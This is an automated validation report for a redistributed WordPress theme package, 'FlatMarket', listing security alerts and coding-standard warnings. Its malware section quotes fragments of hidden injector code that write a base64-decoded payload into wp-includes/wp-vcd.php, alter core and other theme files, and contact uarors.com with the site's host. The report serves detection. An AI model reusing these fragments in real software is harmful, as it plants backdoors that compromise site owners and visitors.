0
Validation results

FlatMarket | Shared by VestaThemes.com

FlatMarket | Shared by VestaThemes.com

WordPress 6.5.3 theme
0
  • THEME TYPEWordPress theme 6.5.3
  • FILE NAMEflatmarket.zip
  • FILE SIZE17116645 bytes
  • MD5951a343f2596d01dc61c3bf81c7b55de
  • SHA189decb9b2297ddbb83cff2f7a9dc3f0dfed1a457
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • THEME URIhttp://magniumthemes.com/
  • VERSION1.9
  • AUTHOR URI
  • TAGSlight,white,fluid-layout,fixed-layout,responsive-layout,custom-colors,custom-menu,featured-images,post-formats,theme-options
  • CREATION DATE2023-09-10
  • LAST FILE UPDATE2023-09-10
  • LAST VALIDATION2023-09-10 00:24
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Title : Title No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);
  3. Security breaches : Use of base64_decode() Found base64_decode in file ipanel.class.php. 375: if (base64_decode($data) === false) {672: $options = unserialize(base64_decode(get_option($this->args['ID'])));872: if ( base64_encode(base64_decode($data, true)) === $data) {873: $option = @unserialize(base64_decode(get_option($this->args['ID'])));878: //$option = @unserialize(base64_decode(get_option($this->args['ID'])));907: if ($data === false || base64_decode($data) === false) {2456: if ($export_value === false || base64_decode($export_value) === false) {Found base64_decode in file class.theme-modules.php. 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));Found base64_decode in file installer.class.php. 291: $_settings = base64_decode( $_settings );1152: $data = json_decode( base64_decode( $_POST['data'] ), true );
  4. Security breaches : Use of base64_encode() Found base64_encode in file ipanel.class.php.
     //$update = $this->updateOption($panel_id, base64_encode(serialize($data)));
     //$output['test'] = base64_encode(serialize($data));
     //return $this->updateOption($this->args['ID'], base64_encode(serialize($options)));
     if ( base64_encode(base64_decode($data, true)) === $data) {
     $export_value = base64_encode(get_option($this->args['ID']));
    Found base64_encode in file downloads-list-compact.php.
     <input type='checkbox' name='downloads[]' value='<?php echo base64_encode(json_encode($download_data)); ?>' <?php
    Found base64_encode in file downloads-list.php.
     <input type='checkbox' name='downloads[]' value='<?php echo base64_encode(json_encode($download_data)); ?>' <?php
    Found base64_encode in file installer.class.php.
     $_settings = base64_encode($_settings);
     $cpndata = base64_encode(json_encode(array('theme_author' => $match['author_name'], 't
  5. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="<?php echo $this-> in file ipanel.class.php. 1330: <iframe src='<?php echo $this->args['live_preview']; ?>' frameborder='0' wi
  6. Malware : Operations on file system file_get_contents was found in the file ipanel.class.php 364: $data = file_get_contents($_FILES['ipanel-import-file']['tmp_name']);1179: $google_fonts_data = file_get_contents(realpath(dirname(__FILE__)).'/googlefonts.json');file_get_contents was found in the file ipanel.class.php 364: $data = file_get_contents($_FILES['ipanel-import-file']['tmp_name']);1179: $google_fonts_data = file_get_contents(realpath(dirname(__FILE__)).'/googlefonts.json');file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));177: $content = @file_get_contents('http://www.uarors.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uarors.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);fopen was found in the file theme-css.php 51: $cache_file = @fopen( get_stylesheet_directory() . '/cache/' . $cache_file_name . '.css', fwrite was found in the file theme-css.php 53: if ( @fwrite( $cache_file, $out ) ) {fopen was found in the file theme-js.php 48: $cache_file = @fopen( get_stylesheet_directory() . '/cache/' . $cache_file_name . '.js', 'fwrite was found in the file theme-js.php 50: if ( @fwrite( $cache_file, $out ) ) {
  7. Admin menu : Themes should use add_theme_page() for adding admin pages. File ipanel.class.php : 187: $admin_page = add_submenu_page(File ipanel.class.php : 199: $admin_page = add_menu_page(File class-tgm-plugin-activation.php : 651: $this->page_hook = call_user_func( 'add_submenu_page', $args['parent_slug'], $args['page_title'], $args['menu_tFile installer.class.php : 121: add_options_page(__('Installer', 'installer'), __('Installer', 'installer')
  8. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was yith-woocommerce-wishlist.1.1.1.zip revslider.zip woosalescountdown.zip mgwoocommercebrands.zip woo_quickview.zip mega_main_menu.zip yith-woocommerce-ajax-search.zip woocommerce.2.6.1.zip js_composer.zip yith-woocommerce-compare.1.2.1.zip multi-image-metabox.zip cloud-zoom-for-woocommerce.0.1.zip.
Warning
  1. special URIs : Presence of bad theme tagsTheme URI and Author URI should not be the same.
  2. theme tags : Presence of bad theme tagsThe tag light has been deprecated, it must be removed from style.css header.The tag white has been deprecated, it must be removed from style.css header.The tag fluid-layout has been deprecated, it must be removed from style.css header.The tag fixed-layout has been deprecated, it must be removed from style.css header.The tag responsive-layout has been deprecated, it must be removed from style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is flatmarket-shared-by-vestathemes-com.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments "Are you sure you want to reset back to the defaults?" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Are you sure?" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Error!' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Options Updated.' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Error!' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "You've not specified any data." in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'There is something wrong with the data.' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Data has been imported successfully.' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'An error occured while importing data.' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Error!' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Options Reset.' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The file permanently deleted.' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'ERROR!' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File URL' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File Path' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File URL' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File Path' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Error!' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Error in download the file.' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Save' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'More themes' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Reset' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Toggle Preview' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Multilingual (WPML)' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'WPML Plugin Installer' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Your browser doesn't support iframes." in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Your browser doesn't support iframes." in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Your browser doesn't support iframes." in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Save' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'More themes' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Reset' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Toggle Preview' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Choose File" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File URL' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File Path' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Delete' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File URL' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'File Path' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Item" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Item" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "New Item" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Item" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Upload" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Choose File" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Choose File" in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "You need to save options first." in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Download File' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Enter Code' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Import File' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Import' in file ipanel.class.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Best Selling Products" in file woo-best-selling-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-best-selling-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" in file woo-best-selling-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-best-selling-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number of Products" in file woo-best-selling-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Product Categories" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Thumbs" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Hide Empty" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Parent" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Set the parent paramater to 0 to only display top level categories." in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "IDs" in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Set ids to a comma separated list of category ids to only show those." in file woo-product-categories.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Menu location" in file mmm-menu.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Menus' in file mmm-menu.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display Menu location" in file mmm-menu.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Menu Location slug" in file mmm-menu.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Product Categories Grid" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Shop Shortcodes' in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Description" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Hide Empty" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Parent" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Set the parent paramater to 0 to only display top level categories." in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "IDs" in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Set ids to a comma separated list of category ids to only show those." in file woo-product-categories-grid.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Products by Attribute" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Attribute" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Filter" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number of Products" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-products-by-attribute.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Products by Category" in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Category" in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number of Products" in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Description for Order By." in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Description for Order." in file woo-products-by-category.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Recent Products" in file woo-recent-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-recent-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" in file woo-recent-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file woo-recent-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Number of Products" in file woo-recent-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order By" in file woo-recent-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Order" in file woo-recent-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Top Rated Products" in file woo-top-rated-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Products' in file woo-top-rated-products.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Display WooCommerce products" 